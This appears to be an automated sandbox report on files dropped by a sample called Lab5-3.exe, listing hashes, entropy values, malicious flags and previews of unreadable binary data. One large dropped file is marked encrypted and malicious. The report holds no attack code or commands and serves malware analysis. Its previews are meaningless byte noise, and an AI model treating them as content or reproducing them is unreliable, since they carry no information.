                                                                                                          Preview:.:B.4RB.ZO^...........)s....^9..lt&c......5....o2....\%.U7t.8R....J.....l...y%.kA.a...6.t!WDNUA..3.xE{.o.R....r..}.j*.%,.\.jw%M-.a'OHOF...?..3Z.]`!oI$I|.,:.Q......\V/...C.A......_!0..Pi..*WH.])*."...3....V..]..A.'.W.3.^..2.ko.e...<...R...*.k'.9m...n.4.3p.:.c........$.M....k.G...\q..(..dI..7...}..!.f.W.5J.I.o..'..:.2."Y......Cd...y);bP...4}O...\.08..,.w.%InCW..C$.JO..D..Cj..".^....L...c......dv...v..WW....:s`...W...;S..kf..-Ye..OQ.^.I.L%.pF#\...Thg.a......^.w..*.o.....-jC........A...+&T.5..>%..g+..0u..}..:.V8<. .....5......Q_..L..{...\./.M....x...Z,$l"X.|hy..c.e3..^.s...0.T....e.............0.)...{y\..R.....=8..W..#....2?.F.f...B.#...c.......^...n%X..'.-u....BD.y.I.."7p........3S\.....N&fw.....}o;...#..<#....jJma.|Z.E...C..i.9w(Y%9...y"...kE..?..U.o........z....u.b.V.......O6.=(.{@9.>|...;6..k.P.E....].(.T..~.T...Si:1....~...\!...s..r.....g>.....`...OFl......z.{.(.4.....q.....p.}...i.;..O3c....0.....;...9?.1%-...."......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13600
                                                                                                          Entropy (8bit):7.987314057247378
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:30E6To3PCsgvzCX87TAnR1GSLzNnYb6Vff/tb:30z6Csds34WSLpnY+fnZ
                                                                                                          MD5:86D0FDAD3875F9F0E461B271F802BC60
                                                                                                          SHA1:7CFF750AD41188CA5642835DEAD5D34D8E2C65EF
                                                                                                          SHA-256:D6A225E65656B57C1BF4AD0B0519C9501E21DBE8405C9D137A39513886030911
                                                                                                          SHA-512:C7D1769567FB050D513D840D8B92994339F3BCEF0BB96C80A1A15DE285A800C0391A909FEA31272F28BFE6EB0CCF3874019C82D2C5C47618E3AEA75667631E15
                                                                                                          Malicious:false
                                                                                                          Preview:......d%..,..^..bx.z.dH...[".N.....#.as...nA`.O........:,..Ee3W[.$.%{P.q.m...R.....I-...r[.V..j.8......"..W=.'...F....W+.s..T..7.yA.2C.Y....R_.*c_.m}.F....:y...../....U.Gu.lx..(.......".U...e......I..R..;!S1..k.2........i...e...lk..<f.#<H.+S...=`.....[..'.%..&.f...t.V......._......t3.(a....R.....I.........0.@.H.M....."..~M;...Uy.IU=.h.y.}..`.{lh..!=..AYj..p...s....E-.1o..W....M....._A?.v.T/....{.....x..E.z.w.,z..J..'M..t.......0..{`...sX..._..0\.]..aJ.......)J.w.J.2.^*....M.0.t..k}..5>K.>W.0...n+BOl>..#fC........*[.k...:.B........H...x):.t.......4G(....F./7X...<y......oJ.a.r...&..).p..........D....s...=&..2...kLAX...P..p/.l8c.A........&[%.)C..(..d..$..a....kN.y...g.n......%,.Z4...3.{..Qu.EwT....o.....%.#...e..x.D...q.#..uG.).r.a.Q......{...S.K.....d...tD.....Z%...:.....'D.q....T.a>.s&t.w.1.c.VOe:...nx.z...Z`c@....l.9..C.....,YQ.....*|.9..].U..+...j.H..0.. ._Ab..(3.^...x..........?..Y)..u..O.>...;8j#jQ../...XYk.B.vi...r.k..n;nG6.5..E.:,V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3920
                                                                                                          Entropy (8bit):7.953465649386596
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:nPN96TJU0uizoEcxLcNwFBC7aOPvN1Gx0uKeY2ElUJ:SJU0fodlcNaUHM0Cb
                                                                                                          MD5:FC563211CC76F127DA307C22BE6AF2CE
                                                                                                          SHA1:BBCCD50D01F5D7161716981D17C29479AFA25D08
                                                                                                          SHA-256:AD6BD7DF41423E578BCF249C3B12C669E1966189906A6941E89AD1D10041604A
                                                                                                          SHA-512:D44E1A7B5315E4AA3B6D9735ED6424790139D9CA69BF2F9B55D02A1922AF41139544AC408204DD083B2227413FCE5B8959FF6263FAB93394A6584C5829399071
                                                                                                          Malicious:false
                                                                                                          Preview:.".v<.i..=.Q%.R.u.5.......1x..N...DyM.zzA.../;.x..H[jK.P.mf,S..'...N.}.>...~..H.Ld..B8~..?...W.=..d..z.va\...D...L.t...D....>......iO..-,{EJ..A.._.']..Uu.v....k{Jv1...c7.l....g*.l..1={.0K.B...n....W.1...~.yv....O..o.1!.@8=..9pj.bU.~"..`....k....A..P<...=y...D.L$Vh.".I..I..t.4.d_..e{....}!........a.._..d..CK<..0p..\.@..$.##-.....k^....CK5....2.Dp....l.bT..,@.*m...O..F..i.j7...pr.`..3....3._..H.......y1..N...`.......4:F..-.....s.....8..t3.S.H-d...r.I.C.H_.4.....3.'....0.........N..y.v7....*.t.G..?7...2....(K.*..,..M0.x..$... _O....Q..P.\-.d^.(j..z.M........7..Y;..O.............$..^@...K.561...E..1....{B."..ai.%#GS...~^5%.:........p..*...8.Z#.$..5.C/.vP.`.....&....& oM.......T..i.......AMSGN.l..`M....9I..EV....Y7D...).b.=+....Zi....{..J.3...,.k......=d....{t.YFN.Y..Zt...v.8.....U.K].^.c.9hRo..W...,.u/..0.O.......[..X..........1..}r."J.5x.V.BE...p\.Zd.Xo...f.M....[!@s.....myO..4....#G../..}...."Z...I.8......GI{`..x...`.i.S/..X...R.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:PGP Secret Sub-key -
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1760
                                                                                                          Entropy (8bit):7.894012697575654
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4m9nhlYxHfUTid3hBaUoSGFcmeykEdEElU92i:fhlYyGx0uKeY2ElUJ
                                                                                                          MD5:EC3BAA29862EFC4660DA77A57A7C1A89
                                                                                                          SHA1:E7283D938B7B53DEB4AF435980C91BE22F3A26DA
                                                                                                          SHA-256:1DB2E788457D2776B47B74E9113FEA87B26622E63E3ABFA838C62F4094BE8E68
                                                                                                          SHA-512:B56E820F494747954BB8501B636F1C68E4B16DA6B0E9978B32648AAB9D799FB1D8F5DCB2041236D441D0090CE1BEC99EAB9803AD971A981F53C8ED226A4688E6
                                                                                                          Malicious:false
                                                                                                          Preview:........._S.....s...:..m.....&..G&p. u.lU.\...c.e....8..t..".P.!..E..c..Q......;...T.y....y..[...o...o.8B%.-/.{'.7...e......,zo..)!... ?a.`..f....e.!K.A.....6..N....#...L..B......{..c.(...XN'.=.m./...CV........".. ..t..{J.2....*..o.P............4FnKE..SL....CJ..1.gH..)YJ.#E..4....a...... .t.E=.0n....#..W/o..0..i..J....~e.<...|T?.%.0.!`OIn].q>.L.+....u.N.P.[.[.[4w......1.y!..0.fVB..s...!.5.[.B..z.i...j.....T.:[/...3...g.;K#.:w_=^.<.r....L.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6544
                                                                                                          Entropy (8bit):7.973851600395798
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:/o50tH/JnFSQlsVP20a4HmUGALsu73pAQ0Cb:+0tfJngKst20RH1GALrLpPtb
                                                                                                          MD5:E697955CDEB175FB179FC890EC396F7F
                                                                                                          SHA1:87E468C56CA35D11FDF53A8CB7EBAFD2BC30B39A
                                                                                                          SHA-256:3AD9BA55C86728948AEEA8009A511D3E3AFC0E7849F412E8DEB8B9D0C3E3A4BC
                                                                                                          SHA-512:2A621167961E7E939516155472D0DFFB253F66323793754375040EBECA571B04F3A4F6C13B3AE28A59659FD2915835A22AB3E34770AD92344D66D261D4D49795
                                                                                                          Malicious:false
                                                                                                          Preview:.v.....x.>==.\..^c....y..G...... z%........L.. ..#.Q,...|i.%"-.x7YsE..f..Hs.(..u.....h.Kx.1._n.g...).'I... ......W.Uuo....7L-5...(...3.z.......7e..(...3.e.F".!s.....!.l.=g..H..hLX..t..>.4Q.u.C....l......Rq9J..7.\..s6H.../f...\..R...........e_....m.........k...Ni...v...>.f...._..nQb~..;UY_C."........_^...Q.x..CP.jJ..W.b.QE...~M]\..)...R..../.....=...k..#....L.E......:1..1I.M."...\9).!..Y.../Lx..-.b...d.1...q/.7.|..p.wq...d..**....<[*.0.&..R..?@.Y.Hc<..K..,.o.J.Y....7...Mz.7.. .....7..P..z......9.M.Zg]&..... TD.Gu.........F..b...i.}...w.wX.%..p......%.Y.i.l.2....6..(..p..FlRy..pnbk....s.7..T5....Is$....p_..L./njiwd...^..Xnl.&..v6.|t..'..o.S..AW.el.$u6..#..O}.....x7k9.Yi.......E9D.q..]@.........w.1Q*pP.j....O...b...koT<R!...?{p...I;...^\=..el2.Q...<.u9...D.i..c..H.G#...}Ol>...$j..#=....Xwe.c.....w".;G..o.....<p.C...Kj..........w./.....>..f1m....3......xNA..........4.F.*#.C......Q....b..k...v.gk......:n.....},..G....Iz.........4.H.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.9123724242829185
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:n62ewfPqa2MVoRiWAHfUTid3hBaUoSGFcmeykEdEElU92i:BfiajiR3HGx0uKeY2ElUJ
                                                                                                          MD5:C894CC8B5C436D13D544A54B549CF9F9
                                                                                                          SHA1:FBB57012FA8C753942B9C16A3C154D4B3D26A866
                                                                                                          SHA-256:49D482181CAA6552D57A8287FF90823F23758A2C1A3C4CEA33D3D53916FC057F
                                                                                                          SHA-512:07939A45B32B82D47D96F1A9253C9F84504398B77CAA6D8E45A8A1BF946DBCFE2A7B4826C8F3241B97883190B1F69AD56286E5972E9D006AD71510CBA6C47C22
                                                                                                          Malicious:false
                                                                                                          Preview:.M.'..=.[xn@....u....9=..1.......]Et.&.MU..q..1.B|.....<2%<f..B.V.~.d./Q-...:CC..G.1T.,w...E.Pa;..i...I..n\..}..K..D..p9<..XR.'.T...r..:...wk...t...+c......=.F....'l...........N..9.2....T...gza..D z:...G.P......D."..,.'|s.1G.n..D.O.b.".....U...tcJ....-.eX.Y......6~...e..s......g.d.U.....Y...\y0....qD......d.....M{.@&:.9..>..\.....[a.v.....f^.....Y.e.{.....Y.{..+......5eD.C.x...G...0.......`.wla....k.@...t$c...{^.q...C%.Ve;LV...[.D.N.e....p|.....5..........z..V> Z;..r...H..[.KC...x.)...........S.....n|b.D...u^.u!....\w.<.....|..=.......A...$.7.i...g.4..<..!...yd#].ic..-Q.;RFM]y..b37n..{..s.'1v..9.Dh.j....#....].Q....d`5n.{N.!.9.%.....;..Yv0.?+.ryI........l9..>..3.......b._8....@~..w./......e.M.v....k.Mp.......[A..(..I..cW.-qc.s.P..=...,..x....\..x%^.y....{.....Tg.W....d|.X...."I...g(.|\....*. [ru.....B...E.D. .].I?N..[.MqVM.....3...9..A4..sC.jPra...-..?e!.+.g/H-.y..;...A^x..T...+.a..@Z!|..^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5663120
                                                                                                          Entropy (8bit):7.990933136762416
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:98304:vJavEu4YXVQJMRkBVZ1KpmlQgxITC0KvKFj8ABRZgofltb8evvW2:ha8lykBVZ1iSaHBFj8ABR5Tbg2
                                                                                                          MD5:11E391FDD998487D74B6947FE2CE0894
                                                                                                          SHA1:F5E6F4FDB1FF8EA80238A07EBE163D123FE4FDB1
                                                                                                          SHA-256:DBD28CD7A695944DF51C80E9411F7EE831D919709C5FD8CB9BAA4F8E7F2C3FBA
                                                                                                          SHA-512:2703CC01D0DBB381BCA21F7ED4BD08CCD599425C45BE881CBAA12361C5F6D7B8770BB32242C751B58DBBB84B9F384E3519443A1C66C87B956FC287585DF57C1C
                                                                                                          Malicious:true
                                                                                                          Preview:...Ax~..x1lm;IV...vN.......S..n...): i.TD..<..h...EGat.. .d...a.&...-.....d0'..JY{Kk.....[.ar...!0.N.u.H..}....V..2.....M....L....}.".@..ZvU.7.5...}...g..r!e)0.><.:.:Mo.Mm..(._R....D!Z....Hot.........Z|.\:l..C.J.m7.. SLV..4&.;...e.q.P..j.xk.p.C...y..jB..q;T\....j.`l.&.4.....{......6u........+..n.C. .k...<.F..?....If+..S....(t...<2....E%..n..S...%cC..ev...?.*"1..4.6J.'.....,O.+.1.3p.....ZU[.A.l|d....)......g.C...n.......t4Nj...Wls9>...S.[..q(........_.f..).e[..f.L...........biw.Z.r2.}U......y._.r...g.].R.w[...S..oT.....?.....C>.y..@H.....H.I.| [p./ p..C9.Y...sy......P.'B&.^.xkn.D.a:.7..=.9_..k..[.u9.p.u....z.<S<...i"........<,.(eI..<..9...R..~.1.E...vF&.......Hk..O~.5....=.._t....j..[Z.w.M.Rs....M...a..?/...?Q+Z..Sy.D......=.&.L...+...... -...y.Q?.]4.T.f......+.x...Y...>lX.&...].~z..d\..X?$.>..qi.E&G&:N....Tu..,.tp5.R..E.t..^o...>l.0.._...$jATn.r,=.O..c|..,..?.U....ZxT......XM....l?....8 ..:|..)'...a]......S..lp5....L.N.N.Q'..$ph.K..2fU(fN..\U7.]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12912
                                                                                                          Entropy (8bit):7.984218265749858
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GqP3keqx5xfMwfc5kMxBhjDry8BIefBYM178wJ603MG2jm98mCUyuHqI3hh50CrZ:P875Zc5xx/ygtfBRdJ608Ljm9G8GCrtb
                                                                                                          MD5:353D3EC5F74BBFA4D4BD41E70D06E2C4
                                                                                                          SHA1:1D2BAB823008C811D56E972DB671DA482AE363CB
                                                                                                          SHA-256:5CD54BBCE92CC54B77C1830D29DEA08FA6EE27B255CF2A6D52F03ED691C12202
                                                                                                          SHA-512:70F68FE55BD9005D433E591955F9BF721B9A2557585DAAAB87D7706D00467A9D5EA68EECD8CCE03B9DF0C53D1F4FCE628F10E804EFC36781FFF8B03BCB7CD26E
                                                                                                          Malicious:false
                                                                                                          Preview:....H....!C..B%g4.DI..2..[_!B.".N........2...Kd..6..j2*......I....3][....\j.)..|....)'..Ts.Z.w..Q.....!>.Q}wF.h'.3.....d...8.)5..T....cW.l.8...e4.y.v...<OOdV_;..Q.\...j.7..:4*0d.aD....U.U.d.B..C...w.Rz..5...h..*S.U.(.Foh......[.6..9..L....A|.=?..&....-..@.B...b..,..Rk:</..a..Hk...ci..9.j..2!........x.?.D..l........{:.rt...<.~.3TV..p9...im...G..GV=.(.0L...2.@...EhJ;b...|#....Bk...y.h..9.rdHyB!.{w.....~..OG#Z...U.....t..)VY..n.4Q..c(^..]M.FS.N..<.e..R.RW.(l.{|3o...Y...w{E....K..,NN.....yG..`.".:.u.......^U.]d...*[..34W.NH(P..&.U.E....!.5...&.l..Za..~.ev].F.b.m.~mYg..L..-.{.x.......~. ......*..z.....E`......\........8..EG.X...PJ.^b."..A..w.;....k..x:.Z..p.,.:...M.x.......j_.N17*H.\.z..^.....w....*N..M.v...C...a.....BRe3mz..,.`...x....I...b......#....v..AC.N....R.....07.B.....m= .`...C......*...<..Y.H.........9?0V..!.aM..6D...Wo.Zz.....V.7>FT..1^]....8E..>...?=/.)6..K.....t..(.z%..V..9.>....'.....W...4..r...s..-Y...{...8....A
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.917705804973728
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Q++MoyCHdKbNeVhHfUTid3hBaUoSGFcmeykEdEElU92i:b+/9KGiGx0uKeY2ElUJ
                                                                                                          MD5:9C65F90E02B632FDCB9193E3859E0D28
                                                                                                          SHA1:62305B9DB64290FC4C66B5E59CCCFB623AE4F7E0
                                                                                                          SHA-256:AF156C847EC3C9522189CCB07461CD3A329CDA680FBEBD20C99B34AED0308B7E
                                                                                                          SHA-512:8C9DB28C7949222BD29722A7AD48A6C6E7377D824EC35EEC730AAA30B5FD158E6F51A0AF06ACB0F9DBE22A36A3B06EACC42251205D95D1BF803CBCB93C8E31FB
                                                                                                          Malicious:false
                                                                                                          Preview:......a*....A..X....G.......1 ...BE...K....p.{.G..4..........=.=S......I......._.l..s-D4..xnl`....]X.4..G@)...._.X.Z.8~..~.!e.B.h.]*~.....N;."L.F...&.....0.S.....4......jm.|......`.;F-.h.c..8...T .6.....B.7k...r.U.i?....m.qku,........k.{.]...(u>..;. .Q.M..Z}..Y|.jN.k7.*.....!.P..4..iE.h..}..N;~..'.S!3..~...b\.N"]b.[..\h.....E.5.%...@..,c#K.Au%2.K.\...5..<.h..V......t...g4...6G.....M>.N..G.:...E./.EIF.'.Fi.ID.SA.....x.X...w._.".@.W.N.9i....[.v(........|k..M7.w..]". .82eB.#.3.1.$2Y...s..Mf%3.`.w....]E,.......Q...:|`....T6>..I.....:........6..E4...D..t6L.+.5..N...a.":...L.I.....\W..S...j.=Z.0KU..E_.../P.n..b*u..}..ZH....q/@.s.....w.\T.m.eD...|.d.V..SO.4/w;gV.......s.PK.....8%.y.....g- c}.J...Q\..9.H..=...$Jri.......m|.R..wQV....~......x.K:..l..z.`/....K.g5.F.L.;B......c+...&.......8......?\Q....o.'....<.zV.8,..>#M.F.........>..~....X..W"....w$..-.e...^^n......SFN.[.y....tJ....l:..o.\>....4mj...?...s...^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.909533604038232
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9r5p/pzpiU0x0vafdvRGRPfYHfUTid3hBaUoSGFcmeykEdEElU92i:J5MVRy3/Gx0uKeY2ElUJ
                                                                                                          MD5:69557E4BC2BC4A657149E5BFDEE27D2F
                                                                                                          SHA1:D9EF66427DF64EB593B1765B0F635EDED9F3AAE6
                                                                                                          SHA-256:4DF3E930C66C78FCE2C4EFA5C16EF2737BB68E325C04023C64A0002251C4EC73
                                                                                                          SHA-512:92874E789F7B8AF60295949B5B8289EDE0F99327F3356E15C9249AFEB85C9274926646219DDD5087704BDF81BB76AEB0BD04E67A89BAB5BE122A3FDA635B60C4
                                                                                                          Malicious:false
                                                                                                          Preview:6l...X.....nB.Ou..q.vDtU...\f..,....8.m.Z..R.R./..........'..Z....'.O(....aB1......<..`:....1.2.\.jvI.fZ`&.'.b.R...o.F.....J5-5....o*"X..xba..(A.l...[...Hs..T+..G..v.$.bW08V.0.?.......wv.A&?....=...u4..~e....P..\\9B......%....A..a..z....t.X...j...j....wlX?....T*,V*...h.;..9....9....*.-f.f"?.`.....7....>.b.%4....ck.l.);....'.....Rt.5..N..(W..M;.2.|.b...H......c....j.N...{_ "H.5.K....g.. ..7.M..#..dwQW..C.(U..&+.[....Kl,i.."...<..u..}..~....$:.M.a..U.SAc...T.Vt.{.].M+.g.B...=O..<!^F.EO...~s..C)....c.5;.d.K*..?.b..c...@.......V..E....... t.0....O9..f._.A.N....!."..3%..X.#....a..B..b...f...9.Aj.....t..u..f."..4...P.!.......sd.....A.2..^.^.]..,...3...}B.kNV.....8...+I._Ax....K....`j~.p.....]{'.V.....f.;N...8.y...d|......V.1.P.ldA.X...b.K....LU.G....7..s..4l/.X...*.).|.k.9.u...l_.;N.......;..I.......U......m.. .A.r.4."...[;.?...*...K.z..i.........*...h.,. *..O+prHD..Y..@!ki,.J.,..I.....>f.9."b.9..~...j.}D..^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.913593241681617
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ShZC3wBxeyMTUaPoBnfHfUTid3hBaUoSGFcmeykEdEElU92i:ShZ0EUyUV6kGx0uKeY2ElUJ
                                                                                                          MD5:C52CFCB5380E406A87D71774B568E5B3
                                                                                                          SHA1:640E58C2CF64C016EAFDD3C55056E5C5E4266739
                                                                                                          SHA-256:DBCA9C810279424A6D62B2D290DFA772ACEBDC83AF59221584335AA41F987E28
                                                                                                          SHA-512:2305FD50F8F8D9D25625FCE2DEA70F9FAF802F4C6DD8DC1EF1BF2466015023E84708F2A96C5779E5BD1497C46369D0457BE42C38815E198D6E96CBF60D63F682
                                                                                                          Malicious:false
                                                                                                          Preview:l...s*.C....b.....(..Q...Q.............v......neR..).rG.v....Z.r\...|$.&/.....{.Ggy..).....>...a..p......(..fm..$.+.........q..!W...."..-.;.2.=K....;...N.3.vH..R........U..o..U.8:..u.....l...M..S<x^..h...F..}..15.SND...D.m...T.......P{.j(....e.Tp..0Z..'...-...2Kn}....i.g.vw~..z.Jy.....dw.v1.o'b....W..T...h....g..UC.K..m.Wb]..c~KI...*..[c.....>...>.r0..;h",...Xf.R.w...f...1to.^.(.o~O.-..].....2U...z....,....n.#|.s.G..w.LDiG.x...O.....r.Z.+..H"o...t......V_.W...J..hZq><'.U..aQ...C20a.(......'.$......o..Wo.h...o.7$....mO...r?6. ...L. 2bPi..U&...g.....6P.u..h...s. K..+S..3.....7.<q.U.d.......l|T.{..l...N...y<..G.iZ..v.DD......cH...._...O.wr|..Iyl.Q..3E. ... ..V0.8`.F0..o...`....~.._!Y.P...$....+u).{K_..[..Y}X...y.U...r*.8....Z....\Wv...d....+[.z....BBs..t`..^......>....qu.w.p....N]....t..,.l..s..amR...1'.b>F.[.*...g.T........JZ.x.3+.=.;;.,.J..o......d..,.{...[J.....Vb)..(..1..R.......9E.-N...@gOK...m.&F.x..^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.931689020646343
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TOXDYF7Diag0oSsHfUTid3hBaUoSGFcmeykEdEElU92i:T+DgDiaBLrGx0uKeY2ElUJ
                                                                                                          MD5:DC74067C4CC8C89DAE4400C22209440C
                                                                                                          SHA1:FFE4FFF2B14B854CB29AC4506DA8A99D626299B9
                                                                                                          SHA-256:EEE12D89C4287E7D2944B5C7AC9C3B621BD84222D0CD7AE7300896F81C726D55
                                                                                                          SHA-512:D447356A3A2088DD56517CF4287E9E118BC18A3E5F2BF17752980D6E4BA40E9F89A701AE808B13919D56E17F6BA68B44E01318CDAF4521F5BABCB5B30BBF1CC3
                                                                                                          Malicious:false
                                                                                                          Preview:E.L"....qc....`?...Fv...L7gl...Hx...3.V.D.-<..2.... G{{...M..I....48D.I.6Z..........Pd...R....N.X..i....9kY=.C?.3..C..d/:)6.2..:S........'"....P#UT......:.v.y&..x.sL.q....q....)t...... .@#2w...u.H....!(.....3E9.U.s...0.....M..X.;8..=....IJ...._:._."./'U...J.=XN.._.r..1.*fK.s.m..*.Xm>d..E5i...$.]...B......M.Md...PVe..]..'...zQ.>^...,U..$....9..T..u..]f..../]Kyj...=..#.A...)..%..\.^.i.bS..F{G+..@. .[.}W..R.^v...XJ.....G?.8e.$%W t....q.G.j."....|...'$j..ZR.........J.. ...T~@6$.U...D....M....g.....1;.v..`.j..~.j..rh.=......?.[N..(...,e.&j.?..{n..-.....b..8.%..'G....e....Q......v...WO>.}..Z!..?....}...*Y.4.._...:Q........(.o....pVA.]....?...q..p...V{..!....&d.......R..D.n.Pl..[.MPK.k]..d5....,...dFpm...@^...xr.....R.....%.'...t.-.......Yo. ......~.Sr..s...e.0g.C....g.Ow.w....*.E.J.&i..#wH..,q.c...~.....RT.B..E.....U...{.is4.".eu...+........|...E.....$...W...a!.>.~u..T>..... 2xWU0...|.+.....>.1.....9?..c...^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.941134410778982
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:L/Oz2gwFFzK7Y4Ec/TmCM6xBD1fjSuZWHfUTid3hBaUoSGFcmeykEdEElU92i:LGigwFdKlEcVJ5WsGx0uKeY2ElUJ
                                                                                                          MD5:9FA4B0E1C9412548DFBE8C677E1C815C
                                                                                                          SHA1:1B7887C4F0B4E9E42039573F68987829C66F5AA6
                                                                                                          SHA-256:5A5FABB3E20557B629C4A8C85B63B6BD16410CE1422413171FC9B23A4AC0CB9B
                                                                                                          SHA-512:B2FDE0A6B455F421E6B60805133D748A5684DC7658E08AD80E1060396D8BAF1363FBB4379816EA92ECEF4F4A55DA4C68CD47DA61C636AE6BEA775E785339E8B6
                                                                                                          Malicious:false
                                                                                                          Preview:...#.B.%.....Nw.*.....5.2.h.q...;;n......(........|..F...I.F....P./......H..m._..+.I@5).V....2e.1A.T.$b....(..v..w...Y .[...i$..=..O....@....N?D..)......B.k..w...z1m..CM..r.....JH.Ona.'}...7zf..{1...vd.RGX....\.Y`P......X._y..5.O..<..mO..e...PI....!h...GK5gK4$..N..!p..%v@X......Q.{..]f.'T....9.N.G.X.%..{T....|B.gI.5>.=.$...4S,GA&#...B.Y...o..M.v..Z.(S.K..y..tW..3V_...!(.R.i/..E.:.B.kh.0BI..t........: .8...tq.Y.....H..JZD=.T..Qx.1d.......z......0.....W.......vG......._L.%.G.i#... .g.......BT5CP.._w..8.o(W..z.........p.B.-...~.U.$.4:.'...L...=%..X6.)4........d.#T.(hWi...)......dZ..^.2].q.f.<..j#f..(.&./.....=Z'z..=.....7.W.\I*.....N.!.~c.Lb..F\..`._;7C..q.2...iz.9[Sc...e..D...D..3Gq.....G...sw._.L.........m...l,.|...~...M...d....'....[.:)C1y:H..'+.....m~<.f.M..'<.$.e..kGw..e.....Ql.wg%o.(.)........%.P.3...$3.AH.L....M.....K1pd.....,f..w...u.K8....DUv..,|...Fi=@..w...+.5d$..t`.*..eb.?$X...2...^d-.1.d.....UZ.O.n.`/.r4&.r....K...>~:.s..!t
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.943221286111018
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:gPcevPZhOBcyYwl1jgAUPUhEKXDEQKHfUTid3hBaUoSGFcmeykEdEElU92i:Kce5kBcyYwl1b7Ec5lGx0uKeY2ElUJ
                                                                                                          MD5:AC6AA9B0C19EE63839EBE276BFA8544F
                                                                                                          SHA1:D85E3524771874CA6CEFDE1CA72BD672CBE7E8AF
                                                                                                          SHA-256:77BE69E5AB032B7E5311BA51A38F5E7417920C4D8491B3CB4A96E76D53067E3D
                                                                                                          SHA-512:09BB367EED0813825227EAA371A6037BFD3E3907E647BFC8AFDF1479EE54F580315ACC5A73F3D996BE56EEA5BE12FB603EDF46BBB7E329F3A3AB9C20D14740C3
                                                                                                          Malicious:false
                                                                                                          Preview:.~`...).Skg..._.c,......7W....(42..~..%......U.Y..I.."...Z.....h.b...s<......tVmHji..."...).y...!G...+.].g..X..y....:.D.*...........9..b.^... *H".QU|.+.n..>t...+.<.#...j.k;.....4U.\Qnl...7d..V... .f.....l....=C%vc?v."...Tn.k....Mz....;..r#......$..%Jn..(.....MdN..Z..Kw.T.[I2..O"NFIf9+M.$H.....oH......W..t.S...q.....'.:............s.4.....7U^...).>.6....L..9.:.dY...Em.fFA....c...~I ./...8#..../A...2....a.j.unj.(%BB.o'.:..N]..$>...j3a4w...1G...H............n1..E:N.Ee-.&.?...ig]C;Z`........5.l..s...T.....K........e....a.....a(Q.W.z....9..7.N...H4.ki..]..(.k.E......w....Db..'..6I...;@Cfe...s.._Vm.L....2.s.....7.A....R{c(...=C...._....e.).&.1.7t3..R.71q...g...vS..<.z...w.Z....M...Q..G]5|...f.a.r.....PgL./..\...=.U.$.?.SuX.'(.Te...p...Z.f.}Y........x.o...r...w..dt...N.O.B...'...dk...f=...&..o_!t....)........g.'s..6..J.<BF.=.<DAA..%..|.....8....i......".R....S+...B....g...."....)...........5.f@.V.~....`...dj*D.A"jzN.........P.A.2M.......);.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.928620045821906
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:56rppXmocxB3drOvom5+f4vHfUTid3hBaUoSGFcmeykEdEElU92i:56rHmo45ovo7f40Gx0uKeY2ElUJ
